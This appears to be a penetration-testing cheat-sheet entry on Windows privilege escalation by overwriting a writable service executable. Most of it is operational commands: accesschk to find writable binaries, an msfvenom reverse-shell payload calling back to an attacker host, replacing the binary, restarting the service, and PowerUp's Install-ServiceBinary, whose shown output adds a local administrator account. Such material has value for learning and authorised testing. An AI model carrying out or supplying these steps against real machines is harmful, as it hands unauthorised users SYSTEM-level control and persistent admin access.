Attacks - Windows Privilege Escalation

Service Exploits - Writable Service Executable

In Windows, services often run with elevated privileges (e.g., SYSTEM). If the executable for a service is writable by a low-privileged user, it can be replaced with a malicious binary, allowing privilege escalation.

How It Works

  1. Service Executables: Each Windows service has a binary executable file that is executed when the service starts.
  2. Writable Executable: If the permissions on the service executable allow a non-administrative user to overwrite it, they can replace it with a malicious executable.
  3. Privilege Escalation: When the service is restarted, the malicious executable runs with the service’s privileges (e.g., SYSTEM).

Steps to Exploit

1. Identify Writable Service Executables

First, check the permissions of the service executable to see if it’s writable by a low-privileged user. This can be done using tools like accesschk.exe:

accesschk.exe /accepteula -wu "C:\Path\To\Service.exe"

The RW in the output indicates that the file is writable by the current user.

2. Replace the Executable with a Malicious File

Use tools like msfvenom to generate a malicious payload, such as a reverse shell, and save it as an .exe file:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your-ip> LPORT=<your-port> -f exe -o MaliciousService.exe

Then, overwrite the original service executable with the malicious one:

move MaliciousService.exe "C:\Path\To\Service.exe"

3. Restart the Service

Restart the service to execute the malicious executable with the service’s elevated privileges:

net stop <service-name>
net start <service-name>

or use PowerUp for easy exploit.

Using PowerUp

Import-Module .\PowerUp.ps1

Invoke-AllChecks

this will do all the enumeration techniques, if you got something like this:

Modifiable Service Files 		Install-ServiceBinary -Name <service-name>

you likely found this service vulnerable.

or you could use Get-ModifiableServiceFile to check for modifiable service file instead of doing all checks.

Get-ModifiableServiceFile

this will enumerate all services where the current user can write to the associated service binary or its arguments

and to exploit it automatically:

Install-ServiceBinary -Name <service-name>

if you got something like this:

VulnService C:\Temp\service.exe net user john Password123! /add && timeout /t 5 && net localgroup Administrators john /add C:\Temp\service.exe

then Voila 🎉, it created an administrative user for you! (don’t forget to restart the service to make it happen)